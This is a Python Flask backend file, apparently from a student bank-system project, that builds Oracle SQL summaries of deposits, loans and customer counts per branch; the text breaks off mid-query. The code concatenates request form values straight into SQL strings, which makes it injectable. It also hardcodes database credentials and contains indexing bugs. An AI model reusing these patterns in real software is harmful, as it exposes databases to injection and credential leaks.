| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c6e0fa0c7dc2d5f178e7149da0108da67416876
| 129,351
|
py
|
Python
|
bankManage/backEndService/summary.py
|
ShangziXue/A-simple-bank-system
|
8d08ae8cfd159286a329da7c35ebc4ca77b2fe6d
|
[
"MIT"
] | null | null | null |
bankManage/backEndService/summary.py
|
ShangziXue/A-simple-bank-system
|
8d08ae8cfd159286a329da7c35ebc4ca77b2fe6d
|
[
"MIT"
] | null | null | null |
bankManage/backEndService/summary.py
|
ShangziXue/A-simple-bank-system
|
8d08ae8cfd159286a329da7c35ebc4ca77b2fe6d
|
[
"MIT"
] | null | null | null |
from flask import Flask
from flask import request
from flask import jsonify
from flask import make_response
from flask_cors import *
import json
import time
import cx_Oracle
import os,sys
import math
from matplotlib import font_manager as fm
import matplotlib as mpl
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from flask import Blueprint
summary_api = Blueprint('summary_api', __name__)
# Oracle 数据字典化函数
def makeDictFactory(cursor):
columnNames = [d[0].lower() for d in cursor.description]
def createRow(*args):
return dict(zip(columnNames, args))
return createRow
#-------------------------------
#查找blist中是否出现a(年)eg.2018
def locate(a,blist):
for i in range(len(blist)):
if blist[i]['time'] == str(a):
return i
return -1
#------------------------------
#查找clist中是否出现a(年)b(month) eg.2018 12
def locate_month(a,b,clist):
combine_ab = str(a) + '.' + str(b)
for i in range(len(clist)):
if clist[i]['time'] == combine_ab:
return i
return -1
#------------------------------
#查找clist中是否出现a(年)b(month) 对应的季度 eg.2018 12
def locate_season(a,b,clist):
s = math.ceil(b/3)
season = str(a) + '-' + str(s)
for i in range(len(clist)):
if clist[i]['time'] == season:
return i
return -1
#==============================================================================================
# 业务统计 后台功能
@summary_api.route('/summary',methods=['POST'])
def summary():
# Todo: 根据前端返回的要求,实现数据库操作,返回统计数据。另外,可以生成统计图,路径为static/summary.png,以供前端调用
connection = cx_Oracle.connect('System/db2019@localhost/ORCL')
cursor = connection.cursor()
lowerBound = request.form['lowerBound']
upperBound = request.form['upperBound']
timegrain = request.form['timegrain']
sumtype = request.form['sumtype']
datatype = request.form['datatype']
graphtype = request.form['graphtype']
#=======================================================================================================
#=============按支行统计=============饼图-=============
#====================================================vv==========================
if graphtype == 'pie':
#==========================业务总金额=======================================
if datatype == 'money':
if sumtype == 'saving':
# #==================================存储业务=======================================
# 支行1 支行2 支行3
# ¥233 ¥345 ¥678 (存储业务)
#
#check account
# sqlcommand = ""
# sqlcommand = sqlcommand + " SELECT"
# sqlcommand = sqlcommand + " BANK_NAME AS B_name1" + ','
# sqlcommand = sqlcommand + " SUM(CHECK_ACCOUNT_MONEY) AS SUM_C_A_money"
# sqlcommand = sqlcommand + " FROM"
# sqlcommand = sqlcommand + "("
# sqlcommand = sqlcommand + " SELECT"
# sqlcommand = sqlcommand + " BANK_NAME AS B_name" + ','
# sqlcommand = sqlcommand + " CHECK_ACCOUNT_ID AS C_A_ID1" + ','
# sqlcommand = sqlcommand + " CHECK_ACCOUNT_MONEY AS C_A_money1"
# sqlcommand = sqlcommand + " FROM"
# sqlcommand = sqlcommand + "("
# sqlcommand = sqlcommand + " SELECT"
# sqlcommand = sqlcommand + " CHECK_ACCOUNT_ID AS C_A_ID" + ','
# sqlcommand = sqlcommand + " CHECK_ACCOUNT_MONEY AS C_A_money"
# sqlcommand = sqlcommand + " FROM"
# sqlcommand = sqlcommand + " CHECK_ACCOUNT"
# sqlcommand = sqlcommand + " WHERE"
# if (len(lowerBound) > 0) :
# sqlcommand = sqlcommand + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
# if (len(upperBound) > 0) :
# sqlcommand = sqlcommand + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
# sqlcommand = sqlcommand + ")"
# sqlcommand = sqlcommand + "NEW_CHECK_ACCOUNT" + ','
# sqlcommand = sqlcommand + " CUSTOMER_CHECK_ACCOUNT"
# sqlcommand = sqlcommand + " WHERE"
# sqlcommand = sqlcommand + " NEW_CHECK_ACCOUNT.CHECK_ACCOUNT_ID == CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID"
# sqlcommand = sqlcommand + ")"
# sqlcommand = sqlcommand + " GROUP BY"
# sqlcommand = sqlcommand + " BANK_NAME"
#---------check account-----------
sqlcommand_check = ""
sqlcommand_check_term = ""
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT
B_name AS B_name1,
SUM(C_A_money1) AS SUM_C_A_money
FROM(
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name,
NEW_CHECK_ACCOUNT.C_A_ID AS C_A_ID1,
NEW_CHECK_ACCOUNT.C_A_money AS C_A_money1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID,
CHECK_ACCOUNT_MONEY AS C_A_money
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT,
CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = ""
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT
B_name AS B_name2,
SUM(D_A_money1) AS SUM_D_A_money
FROM(
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name,
NEW_DEPOSIT_ACCOUNT.D_A_ID AS D_A_ID1,
NEW_DEPOSIT_ACCOUNT.D_A_money AS D_A_money1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID,
DEPOSIT_ACCOUNT_MONEY AS D_A_money
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,
CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#-----------合并储蓄账户和支票账户 查询结果------------
columnlist_pie_money_saving = []
rawData_pie_money_saving = {}
for i in range(len(result_check)):
columnlist_pie_money_saving.append(result_check[i]['b_name1'])
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnlist_pie_money_saving:
columnlist_pie_money_saving.append(result_deposit[i]['b_name2'])
print('columnlist_pie_money_saving is:')
print(columnlist_pie_money_saving)
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in rawData_pie_money_saving:
rawData_pie_money_saving[result_check[i]['b_name1']] = result_check[i]['sum_c_a_money']
else:
rawData_pie_money_saving[result_check[i]['b_name1']] += result_check[i]['sum_c_a_money']
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in rawData_pie_money_saving:
rawData_pie_money_saving[result_deposit[i]['b_name2']] = result_deposit[i]['sum_d_a_money']
else:
rawData_pie_money_saving[result_deposit[i]['b_name2']] += result_deposit[i]['sum_d_a_money']
print('rawData_pie_money_saving is:')
print(rawData_pie_money_saving)
#--------------饼状图----------------
# plt.rcParams['font.sans-serif']=['SimHei']
# keys = []
# values = []
# for i in range(len(columnlist_pie_money_saving)):
# values.append(rawData_pie_money_saving[columnlist_pie_money_saving[i]])
# for i in range(len(columnlist_pie_money_saving)):
# keys.append(columnlist_pie_money_saving[i].strip())
# print('ooooooooooooooooo---pie---oooooooooooo:')
# print(columnlist_pie_money_saving)
# s = pd.Series(values, index=keys)
# labels = s.index
# sizes = s.values
# #fig1, ax1 = plt.subplots( figsize=(6,6)) # 设置绘图区域大小
# fig1, ax1 = plt.subplots()
# ax1.pie(sizes, labels=labels, autopct='%1.0f%%',
# shadow=True, startangle=190)
# ax1.axis('equal')
# if os.path.exists(r'../static/summary.png'):
# os.remove(r'../static/summary.png')
# print('finish remove')
# plt.savefig(r'../static/summary.png')
# #plt.show()
#-------饼状图end-------------
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_money_saving,
'rawData':[
rawData_pie_money_saving
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
elif sumtype == 'loan':
#=============================贷款业务==========================
#
# 支行1 支行2 支行3
# ¥233 ¥345 ¥678 (loan)
#
sqlcommand_loan = ""
sqlcommand_loan_term = ""
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
bank_name1 AS bank_name2,
SUM(pay_money1) AS sum_pay_money2
FROM(
SELECT NEW_PAY.loan_id0 AS loan_id1,
NEW_PAY.pay_date0 AS pay_date1,
NEW_PAY.pay_money0 AS pay_money1,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0,
PAY_MONEY AS pay_money0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID
)
GROUP BY bank_name1
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#--------结果处理---------
columnlist_pie_money_loan = []
rawData_pie_money_loan = {}
for i in range(len(result_loan)):
columnlist_pie_money_loan.append(result_loan[i]['bank_name2'])
print('columnlist_pie_money_loan is:')
print(columnlist_pie_money_loan)
for i in range(len(result_loan)):
rawData_pie_money_loan[result_loan[i]['bank_name2']] = result_loan[i]['sum_pay_money2']
print('rawData_pie_money_loan is:')
print(rawData_pie_money_loan)
#-------------饼状图-------------------
# plt.rcParams['font.sans-serif']=['SimHei']
# values = []
# keys = []
# for i in range(len(columnlist_pie_money_loan)):
# values.append(rawData_pie_money_loan[columnlist_pie_money_loan[i]])
# for i in range(len(columnlist_pie_money_loan)):
# keys.append( columnlist_pie_money_loan[i].strip() )
# print('ooooooooooooooooo---pie---oooooooooooo:')
# print(columnlist_pie_money_loan)
# s = pd.Series(values, index=keys)
# labels = s.index
# sizes = s.values
# #fig1, ax1 = plt.subplots( figsize=(6,6)) # 设置绘图区域大小
# fig1, ax1 = plt.subplots()
# ax1.pie(sizes, labels=labels, autopct='%1.0f%%',
# shadow=True, startangle=190)
# ax1.axis('equal')
# if os.path.exists(r'../static/summary.png'):
# os.remove(r'../static/summary.png')
# print('finish remove')
# plt.savefig(r'../static/summary.png')
#plt.show()
#------------end---------------------
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_money_loan,
'rawData':[
rawData_pie_money_loan
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
elif sumtype == 'all':#所有业务
#
# 支行1 支行2 支行3
# ¥233 ¥345 ¥678 (all)
#
#------no.1---loan--------
sqlcommand_loan = ""
sqlcommand_loan_term = ""
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
bank_name1 AS bank_name2,
SUM(pay_money1) AS sum_pay_money2
FROM(
SELECT NEW_PAY.loan_id0 AS loan_id1,
NEW_PAY.pay_date0 AS pay_date1,
NEW_PAY.pay_money0 AS pay_money1,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0,
PAY_MONEY AS pay_money0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID
)
GROUP BY bank_name1
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#------no.2---check--------
sqlcommand_check = ""
sqlcommand_check_term = ""
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT
B_name AS B_name1,
SUM(C_A_money1) AS SUM_C_A_money
FROM(
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name,
NEW_CHECK_ACCOUNT.C_A_ID AS C_A_ID1,
NEW_CHECK_ACCOUNT.C_A_money AS C_A_money1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID,
CHECK_ACCOUNT_MONEY AS C_A_money
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT,
CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
#------no.3---deposit--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = ""
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT
B_name AS B_name2,
SUM(D_A_money1) AS SUM_D_A_money
FROM(
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name,
NEW_DEPOSIT_ACCOUNT.D_A_ID AS D_A_ID1,
NEW_DEPOSIT_ACCOUNT.D_A_money AS D_A_money1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID,
DEPOSIT_ACCOUNT_MONEY AS D_A_money
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,
CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#--------结果处理---------
columnlist_pie_money_all = []
rawData_pie_money_all = {}
for i in range(len(result_loan)):
columnlist_pie_money_all.append(result_loan[i]['bank_name2'])
for i in range(len(result_check)):
if result_deposit[i]['b_name2'] not in columnlist_pie_money_all:
columnlist_pie_money_all.append(result_check[i]['b_name1'])
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnlist_pie_money_all:
columnlist_pie_money_all.append(result_deposit[i]['b_name2'])
print('columnlist_pie_money_all is:')
print(columnlist_pie_money_all)
for i in range(len(result_loan)):
if result_loan[i]['bank_name2'] not in rawData_pie_money_all:
rawData_pie_money_all[result_loan[i]['bank_name2']] = result_loan[i]['sum_pay_money2']
else:
rawData_pie_money_all[result_loan[i]['bank_name2']] += result_loan[i]['sum_pay_money2']
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in rawData_pie_money_all:
rawData_pie_money_all[result_check[i]['b_name1']] = result_check[i]['sum_c_a_money']
else:
rawData_pie_money_all[result_check[i]['b_name1']] += result_check[i]['sum_c_a_money']
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in rawData_pie_money_all:
rawData_pie_money_all[result_deposit[i]['b_name2']] = result_deposit[i]['sum_d_a_money']
else:
rawData_pie_money_all[result_deposit[i]['b_name2']] += result_deposit[i]['sum_d_a_money']
print('rawData_pie_money_all is:')
print(rawData_pie_money_all)
#-------------饼状图-------------------
# plt.rcParams['font.sans-serif']=['SimHei']
# values = []
# keys = []
# for i in range(len(columnlist_pie_money_all)):
# values.append(rawData_pie_money_all[columnlist_pie_money_all[i]])
# for i in range(len(columnlist_pie_money_all)):
# keys.append(columnlist_pie_money_all[i].strip())
# s = pd.Series(values, index=keys)
# labels = s.index
# sizes = s.values
# #fig1, ax1 = plt.subplots( figsize=(6,6)) # 设置绘图区域大小
# fig1, ax1 = plt.subplots()
# ax1.pie(sizes, labels=labels, autopct='%1.0f%%',
# shadow=True, startangle=190)
# ax1.axis('equal')
# if os.path.exists(r'../static/summary.png'):
# os.remove(r'../static/summary.png')
# print('finish remove')
# plt.savefig(r'../static/summary.png')
# #plt.show()
#------------end---------------------
if result_loan or result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_money_all,
'rawData':[
rawData_pie_money_all
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
elif datatype == 'user':
#=======================================用户数=======================================
#
# 支行1 支行2 支行3
# 5人 10人 8人 (存储业务)
#
#==========================用户统计=============存储业务==========================
if sumtype == 'saving':
#-------check-----account-----
sqlcommand_check = ""
sqlcommand_check_term = ""
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT
B_name AS B_name1,
COUNT( distinct customer_id) AS count_customer1
FROM(
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name,
CUSTOMER_CHECK_ACCOUNT.CUSTOMER_ID AS customer_id,
NEW_CHECK_ACCOUNT.C_A_ID AS C_A_ID1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT, CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = ""
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT
B_name AS B_name2,
COUNT( distinct customer_id) AS count_customer2
FROM(
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name,
CUSTOMER_DEPOSIT_ACCOUNT.CUSTOMER_ID AS customer_id,
NEW_DEPOSIT_ACCOUNT.D_A_ID AS D_A_ID1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#=============用户统计=============储蓄业务-----结果处理-----------
columnlist_pie_user_saving = []
rawData_pie_user_saving = {}
for i in range(len(result_check)):
columnlist_pie_user_saving.append(result_check[i]['b_name1'])
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnlist_pie_user_saving:
columnlist_pie_user_saving.append(result_deposit[i]['b_name2'])
print('columnlist_pie_user_saving is:')
print(columnlist_pie_user_saving)
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in rawData_pie_user_saving:
rawData_pie_user_saving[result_check[i]['b_name1']] = result_check[i]['count_customer1']
else:
rawData_pie_user_saving[result_check[i]['b_name1']] += result_check[i]['count_customer1']
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in rawData_pie_user_saving:
rawData_pie_user_saving[result_deposit[i]['b_name2']] = result_deposit[i]['count_customer2']
else:
rawData_pie_user_saving[result_deposit[i]['b_name2']] += result_deposit[i]['count_customer2']
print('rawData_pie_user_saving is:')
print(rawData_pie_user_saving)
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_user_saving,
'rawData':[
rawData_pie_user_saving
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#---------
#
# 支行1 支行2 支行3
# 5人 10人 8人 (贷款业务)
#
#=============用户统计=============贷款业务=============:
elif sumtype == 'loan':
sqlcommand_loan = ""
sqlcommand_loan_term = ""
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
bank_name1 AS bank_name3,
COUNT( distinct customer_id) AS count_customer3
FROM(
SELECT NEW_PAY.loan_id0 AS loan_id1,
LOAN_CUSTOMER.CUSTOMER_ID AS customer_id,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN, LOAN_CUSTOMER
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID and NEW_PAY.loan_id0 = LOAN_CUSTOMER.LOAN_ID
)
GROUP BY bank_name1
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------用户统计----贷款业务-------结果处理---------
columnlist_pie_user_loan = []
rawData_pie_user_loan = {}
for i in range(len(result_loan)):
columnlist_pie_user_loan.append(result_loan[i]['bank_name3'])
print('columnlist_pie_user_loan is:')
print(columnlist_pie_user_loan)
for i in range(len(result_loan)):
rawData_pie_user_loan[result_loan[i]['bank_name3']] = result_loan[i]['count_customer3']
print('rawData_pie_user_loan is:')
print(rawData_pie_user_loan)
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_user_loan,
'rawData':[
rawData_pie_user_loan
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#
# 支行1 支行2 支行3
# 5人 10人 8人 (all业务)
elif sumtype == 'all':
#-------用户统计----all业务---------:
#------------no.1-------check--------
sqlcommand_check = ""
sqlcommand_check_term = ""
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT
B_name AS B_name1,
COUNT( distinct customer_id) AS count_customer1
FROM(
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name,
CUSTOMER_CHECK_ACCOUNT.CUSTOMER_ID AS customer_id,
NEW_CHECK_ACCOUNT.C_A_ID AS C_A_ID1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT, CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
#-----------no.2--------deposit-----------
sqlcommand_deposit = ""
sqlcommand_deposit_term = ""
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT
B_name AS B_name2,
COUNT( distinct customer_id) AS count_customer2
FROM(
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name,
CUSTOMER_DEPOSIT_ACCOUNT.CUSTOMER_ID AS customer_id,
NEW_DEPOSIT_ACCOUNT.D_A_ID AS D_A_ID1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
)
GROUP BY B_name
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#-----------no.3---------loan------
sqlcommand_loan = ""
sqlcommand_loan_term = ""
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT
